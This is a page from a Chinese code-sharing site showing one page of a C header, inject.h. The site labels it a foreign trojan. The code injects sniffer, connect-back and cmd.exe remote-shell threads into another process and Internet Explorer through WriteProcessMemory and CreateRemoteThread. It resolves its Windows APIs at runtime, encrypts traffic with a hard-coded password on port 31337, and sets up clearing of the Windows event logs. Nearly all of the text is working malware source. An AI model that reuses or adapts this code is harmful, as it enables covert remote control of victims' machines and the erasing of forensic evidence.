📄 inject.h

📁 一个外国的木马哦,功能挺多的
💻 H
📖 第 1 页 / 共 5 页
字号:
上一页 1 2 3 45
		break;
	}

//////////////////
// copy function to process

	if ( ! WriteProcessMemory( h, psniffthread, &SniffPackets, SniffTCodeSize, 0 ) )
	{
	//	MessageBox(0,"err3","",MB_OK);
		break;
	}
	if (!WriteProcessMemory( h, piconnecthread, &IConnectThread, ConnectTCodeSize, 0 ) )
	{
	//	MessageBox(0,"err3","",MB_OK);
		break;
	}

	if (!WriteProcessMemory( h, preadshellthread, &ISessionReadShellThread, RShellTCodeSize, 0 ) )
	{
	//	MessageBox(0,"err3","",MB_OK);
		break;
	}
	if (!WriteProcessMemory( h, pwriteshellthread, &ISessionWriteShellThread, WShellTCodeSize, 0 ) )
	{
	//	MessageBox(0,"err3","",MB_OK);
		break;
	}
	if ( ! WriteProcessMemory( h, pIEStartInjectThread, &IStartInjectIEThread,IEStartInjectCodeSize, 0 ) )
	{
	//	MessageBox(0,"err3","",MB_OK);
		break;
	}
// initialize data area for remote process
///////////////////////////
	HMODULE hk32;
	hk32=LoadLibrary("kernel32.dll");
	if(hk32==0){	
		//MessageBox(0,"hk32","5",MB_OK);
		return 0;}

	lclsniffpar.pLoadLibrary=(tLoadLibrary)GetProcAddress(hk32,"LoadLibraryA");
	lclsniffpar.pGetProcAddress=(tGetProcAddress)GetProcAddress(hk32,"GetProcAddress");
	lclsniffpar.pFreeLibrary=(tFreeLibrary)GetProcAddress(hk32,"FreeLibrary");
	lclsniffpar.pCreateThread = (tCreateThread) GetProcAddress( hk32, "CreateThread" );
	///
	lclconnectpar.pLoadLibrary=(tLoadLibrary)GetProcAddress(hk32,"LoadLibraryA");
	lclconnectpar.pGetProcAddress=(tGetProcAddress)GetProcAddress(hk32,"GetProcAddress");
	lclconnectpar.pFreeLibrary=(tFreeLibrary)GetProcAddress(hk32,"FreeLibrary");


	lclwriteshellpar.pLoadLibrary=(tLoadLibrary)GetProcAddress(hk32,"LoadLibraryA");
	lclwriteshellpar.pGetProcAddress=(tGetProcAddress)GetProcAddress(hk32,"GetProcAddress");
	lclwriteshellpar.pFreeLibrary=(tFreeLibrary)GetProcAddress(hk32,"FreeLibrary");

	lclreadshellpar.pLoadLibrary=(tLoadLibrary)GetProcAddress(hk32,"LoadLibraryA");
	lclreadshellpar.pGetProcAddress=(tGetProcAddress)GetProcAddress(hk32,"GetProcAddress");
	lclreadshellpar.pFreeLibrary=(tFreeLibrary)GetProcAddress(hk32,"FreeLibrary");

	lclieparam.pLoadLibrary=(tLoadLibrary)GetProcAddress(hk32,"LoadLibraryA");
	lclieparam.pGetProcAddress=(tGetProcAddress)GetProcAddress(hk32,"GetProcAddress");
	lclieparam.pFreeLibrary=(tFreeLibrary)GetProcAddress(hk32,"FreeLibrary");

	if(lclsniffpar.pLoadLibrary==0){
		//MessageBox(0,"hk1","5",MB_OK);
		return 0;
	}
	if(lclsniffpar.pGetProcAddress==0){
		//MessageBox(0,"hk2","5",MB_OK);
		return 0;
	}
	FreeLibrary( hk32 );


//	lstrcpy(lclconnectpar.szuser32dll,"user32.dll");
	lstrcpy(lclconnectpar.szWs232,"Ws2_32.dll");
	lstrcpy(lclconnectpar.szkernel32dll,"kernel32.dll");
	lstrcpy(lclconnectpar.szAdvapi32,"Advapi32.dll");
//	lstrcpy(lclconnectpar.szMessageBoxA,"MessageBoxA");

	lstrcpy(lclconnectpar.szWSAStartup,"WSAStartup");
	lstrcpy(lclconnectpar.szsocket,"socket");
	lstrcpy(lclconnectpar.szgethostbyname,"gethostbyname");
	lstrcpy(lclconnectpar.szconnect,"connect");
	lstrcpy(lclconnectpar.szhtons,"htons");
	lstrcpy(lclconnectpar.szinet_addr,"inet_addr");
//	lstrcpy(lclconnectpar.host,"localhost");
//	lclconnectpar.port=31337;

	lstrcpy(lclconnectpar.szcmdexe,"cmd.exe");
	lstrcpy(lclconnectpar.szGetCurrentProcess,"GetCurrentProcess");
	lstrcpy(lclconnectpar.szDuplicateHandle,"DuplicateHandle");
	lstrcpy(lclconnectpar.szCreatePipe,"CreatePipe");
	lstrcpy(lclconnectpar.szclosesocket,"closesocket");
	lstrcpy(lclconnectpar.szCreateProcess,"CreateProcessA");
	lstrcpy(lclconnectpar.szCloseHandle,"CloseHandle");
	lstrcpy(lclconnectpar.szCreateThread,"CreateThread");
	lstrcpy(lclconnectpar.szWaitForMultipleObjects,"WaitForMultipleObjects");
	lstrcpy(lclconnectpar.szTerminateThread,"TerminateThread");
	lstrcpy(lclconnectpar.szTerminateProcess,"TerminateProcess");
	lstrcpy(lclconnectpar.szDisconnectNamedPipe,"DisconnectNamedPipe");
	lstrcpy(lclconnectpar.szGetCurrentProcess,"GetCurrentProcess");
//	lstrcpy(lclconnectpar.szPostQuitMessage,"PostQuitMessage");

	lstrcpy(lclconnectpar.szRegisterEventSource,"RegisterEventSourceA");
	lstrcpy(lclconnectpar.szClearEventLog,"ClearEventLogA");
	lstrcpy(lclconnectpar.szDeregisterEventSource,"DeregisterEventSource");
	lstrcpy(lclconnectpar.szApplications,"Applications");
	lstrcpy(lclconnectpar.szSecu,"Secu");
	lstrcpy(lclconnectpar.szSystem,"System");
	lstrcpy(lclconnectpar.szExitProcess,"ExitProcess");	
	lclconnectpar.port=31337;

	//initialize thread address
	lclsniffpar.pConnectParam=orgconnectpar;
	lclsniffpar.pIConnectThread=(tIConnectThread)piconnecthread;

	//lclconnectpar.preadshellpar=orgreadshellpar;
	//lclconnectpar.writeshellpar=orgwriteshellpar;
	//lclconnectpar.pISessionWriteShellThread=pwriteshellthread;
	//lclconnectpar.pISessionReadShellThread=preadshellthread;
	lclwriteshellpar.Session=&lclconnectpar.Session;
	lclreadshellpar.Session=&lclconnectpar.Session;



	lclsniffpar.sa.sin_family=AF_INET;
	lclsniffpar.sa.sin_addr.s_addr=inet_addr(GetLocalIP());	

	lclsniffpar.sa.sin_port=htons((u_short)0);
	lclsniffpar.optval=1;
	memset(lclsniffpar.RcvBuf,0,sizeof(lclsniffpar.RcvBuf));
//	lstrcpy(lclsniffpar.szuser32dll,"user32.dll");
	lstrcpy(lclsniffpar.szWs232,"Ws2_32.dll");
	lstrcpy(lclsniffpar.szkernel32dll,"kernel32.dll");
	lstrcpy(lclsniffpar.szAdvapi32,"Advapi32.dll");
//	lstrcpy(lclsniffpar.szMessageBoxA,"MessageBoxA");
	lstrcpy(lclsniffpar.szSleep,"Sleep");
	lstrcpy(lclsniffpar.szWSAStartup,"WSAStartup");
	lstrcpy(lclsniffpar.szsocket,"socket");
	lstrcpy(lclsniffpar.szbind,"bind");
	lstrcpy(lclsniffpar.szrecv,"recv");
	lstrcpy(lclsniffpar.szWSAIoctl,"WSAIoctl");

	lstrcpy(lclsniffpar.szLocalPassword,SERVER_PASS);
	lstrcpy(lclsniffpar.CSP,"Microsoft Base Cryptographic Provider v1.0");
	lstrcpy(lclsniffpar.szCryptAcquireContext,"CryptAcquireContextA");
	lstrcpy(lclsniffpar.szCryptCreateHash,"CryptCreateHash");
	lstrcpy(lclsniffpar.szCryptHashData,"CryptHashData");
	lstrcpy(lclsniffpar.szCryptDeriveKey,"CryptDeriveKey");
	lstrcpy(lclsniffpar.szCryptDecrypt,"CryptDecrypt");
	lstrcpy(lclsniffpar.szCryptDestroyKey,"CryptDestroyKey");
	lstrcpy(lclsniffpar.szCryptDestroyHash,"CryptDestroyHash");
	lstrcpy(lclsniffpar.szCryptReleaseContext,"CryptReleaseContext");
	lstrcpy(lclsniffpar.szlstrlen,"lstrlenA");
	lstrcpy(lclsniffpar.szlstrcpy,"lstrcpyA");
	lstrcpy(lclsniffpar.szlstrcmp,"lstrcmpA");
	

	lstrcpy(lclsniffpar.szAdjustTokenPrivileges,"AdjustTokenPrivileges");
	lstrcpy(lclsniffpar.szOpenProcessToken,"OpenProcessToken");
	lstrcpy(lclsniffpar.szLookupPrivilegeValue,"LookupPrivilegeValueA");
	lstrcpy(lclsniffpar.szCloseHandle,"CloseHandle");
	lstrcpy(lclsniffpar.szGetCurrentProcess,"GetCurrentProcess");

//	lstrcpy(lclsniffpar.szCreateFile,"CreateFileA");
//	lstrcpy(lclsniffpar.szWriteFile,"WriteFile");
//	lstrcpy(lclsniffpar.szSetFilePointer,"SetFilePointer");	
//	lstrcpy(lclsniffpar.filename,"c:\\icmplog.txt");
//	lstrcpy(lclsniffpar.CR,"\r\n");	
	lstrcpy(lclsniffpar.szinet_ntoa,"inet_ntoa");
	

	lclsniffpar.pIEParam=orgieparam;
	lclsniffpar.pIStartInjectIEThread=(tIStartInjectIEThread)pIEStartInjectThread;



//	lstrcpy(lclieparam.szuser32dll,"user32.dll");
	lstrcpy(lclieparam.szkernel32dll,"kernel32.dll");
//	lstrcpy(lclieparam.szMessageBoxA,"MessageBoxA");
	lstrcpy(lclieparam.szCreateProcess,"CreateProcessA");
	//lstrcpy(lclieparam.sziexplorerexe,"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE");
	lstrcpy(lclieparam.szVirtualAllocEx,"VirtualAllocEx");
	lstrcpy(lclieparam.szWriteProcessMemory,"WriteProcessMemory");
	lstrcpy(lclieparam.szCreateRemoteThread,"CreateRemoteThread");
	lstrcpy(lclieparam.szOpenProcess,"OpenProcess");
	//Finding IE path
	BYTE  pathie[500];
	DWORD size;
	HKEY hkeyresult;
	RegCreateKey(HKEY_LOCAL_MACHINE, ( LPCTSTR ) "SOFTWARE\\Microsoft\\IE4\\Setup", &hkeyresult );  size=500;
	RegQueryValueEx ( hkeyresult, ( LPCTSTR )"Path" , 0, 0,pathie, &size ) ;
	RegCloseKey ( hkeyresult );
	ExpandEnvironmentStrings((char *)pathie,lclieparam.sziexplorerexe,sizeof(lclieparam.sziexplorerexe));
	lstrcat(lclieparam.sziexplorerexe,"\\IEXPLORE.EXE");



	lclieparam.iIConnectThreadsize=ConnectTCodeSize;
	lclieparam.iISessionWriteShellThreadsize=WShellTCodeSize;
	lclieparam.iISessionReadShellThreadsize=RShellTCodeSize;


	lclieparam.lclpReadShellTParam=orgreadshellpar;
	lclieparam.lclpWriteShellTParam=orgwriteshellpar;
 	lclieparam.lclpConnectParam=orgconnectpar;
	lclieparam.plclIConnectThread=(tIConnectThread)piconnecthread;
	lclieparam.plclISessionWriteShellThread=(tISessionWriteShellThread)pwriteshellthread;
	lclieparam.plclISessionReadShellThread=(tISessionReadShellThread)preadshellthread;



//	lstrcpy(lclwriteshellpar.szuser32dll,"user32.dll");
	lstrcpy(lclwriteshellpar.szWs232,"Ws2_32.dll");
	lstrcpy(lclwriteshellpar.szkernel32dll,"kernel32.dll");
//	lstrcpy(lclwriteshellpar.szMessageBoxA,"MessageBoxA");
	lstrcpy(lclwriteshellpar.szrecv,"recv");
	lstrcpy(lclwriteshellpar.szWriteFile,"WriteFile");
	lstrcpy(lclwriteshellpar.szExitThread,"ExitThread");
//	lstrcpy(lclwriteshellpar.szlstrcmpi,"lstrcmpi");

	lstrcpy(lclwriteshellpar.szAdvapi32,"Advapi32.dll");
	lstrcpy(lclwriteshellpar.szLocalPassword,SERVER_PASS);
	lstrcpy(lclwriteshellpar.CSP,"Microsoft Base Cryptographic Provider v1.0");
	lstrcpy(lclwriteshellpar.szCryptAcquireContext,"CryptAcquireContextA");
	lstrcpy(lclwriteshellpar.szCryptCreateHash,"CryptCreateHash");
	lstrcpy(lclwriteshellpar.szCryptHashData,"CryptHashData");
	lstrcpy(lclwriteshellpar.szCryptDeriveKey,"CryptDeriveKey");
	lstrcpy(lclwriteshellpar.szCryptDecrypt,"CryptDecrypt");
	lstrcpy(lclwriteshellpar.szCryptDestroyKey,"CryptDestroyKey");
	lstrcpy(lclwriteshellpar.szCryptDestroyHash,"CryptDestroyHash");
	lstrcpy(lclwriteshellpar.szCryptReleaseContext,"CryptReleaseContext");
	lstrcpy(lclwriteshellpar.szlstrlen,"lstrlenA");



//	lstrcpy(lclreadshellpar.szuser32dll,"user32.dll");
	lstrcpy(lclreadshellpar.szWs232,"Ws2_32.dll");
	lstrcpy(lclreadshellpar.szkernel32dll,"kernel32.dll");
//	lstrcpy(lclreadshellpar.szMessageBoxA,"MessageBoxA");
	lstrcpy(lclreadshellpar.szPeekNamedPipe,"PeekNamedPipe");
	lstrcpy(lclreadshellpar.szSleep,"Sleep");
	lstrcpy(lclreadshellpar.szExitThread,"ExitThread");
	lstrcpy(lclreadshellpar.szReadFile,"ReadFile");
	lstrcpy(lclreadshellpar.szsend,"send");

	lstrcpy(lclreadshellpar.szAdvapi32,"Advapi32.dll");
	lstrcpy(lclreadshellpar.szLocalPassword,SERVER_PASS);

	lstrcpy(lclreadshellpar.CSP,"Microsoft Base Cryptographic Provider v1.0");
	lstrcpy(lclreadshellpar.szCryptAcquireContext,"CryptAcquireContextA");
	lstrcpy(lclreadshellpar.szCryptCreateHash,"CryptCreateHash");
	lstrcpy(lclreadshellpar.szCryptHashData,"CryptHashData");
	lstrcpy(lclreadshellpar.szCryptDeriveKey,"CryptDeriveKey");
	lstrcpy(lclreadshellpar.szCryptEncrypt,"CryptEncrypt");
	lstrcpy(lclreadshellpar.szCryptDestroyKey,"CryptDestroyKey");
	lstrcpy(lclreadshellpar.szCryptDestroyHash,"CryptDestroyHash");
	lstrcpy(lclreadshellpar.szCryptReleaseContext,"CryptReleaseContext");
	lstrcpy(lclreadshellpar.szlstrlen,"lstrlenA");


	if (! WriteProcessMemory( h, orgieparam, &lclieparam, sizeof lclieparam, 0 ) )
	{
		//MessageBox(0,"err6","",MB_OK);
		break;
	}
	//writing Data on tarjet process..
	if (! WriteProcessMemory( h, orgsniffpar, &lclsniffpar, sizeof lclsniffpar, 0 ) )
	{
		//MessageBox(0,"err6","",MB_OK);
		break;
	}
	if (! WriteProcessMemory( h, orgconnectpar, &lclconnectpar, sizeof lclconnectpar, 0 ) )
	{
		//MessageBox(0,"err6","",MB_OK);
		break;
	}

	if (! WriteProcessMemory( h, orgwriteshellpar, &lclwriteshellpar, sizeof lclconnectpar, 0 ) )
	{
		//MessageBox(0,"err6","",MB_OK);
		break;
	}

	if (! WriteProcessMemory( h, orgreadshellpar, &lclreadshellpar, sizeof lclconnectpar, 0 ) )
	{
		//MessageBox(0,"err6","",MB_OK);
		break;
	}

	//Create remote thread on target process..
	ht = CreateRemoteThread( h, 0, 0, (DWORD (__stdcall *)( void *)) psniffthread, orgsniffpar, 0, &rc );
	if ( ht == NULL )
	{
		//MessageBox(0,"err7","",MB_OK);
		break;
	}
}while(FALSE);
//	MessageBox(0,"All okkk","",MB_OK);
return 0;
}
上一页 1 2 3 45
💿 文件大小 100 K
👤 上传用户 novelty1234
📂 所属分类其他
🏷️ 相关标签

#木马
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -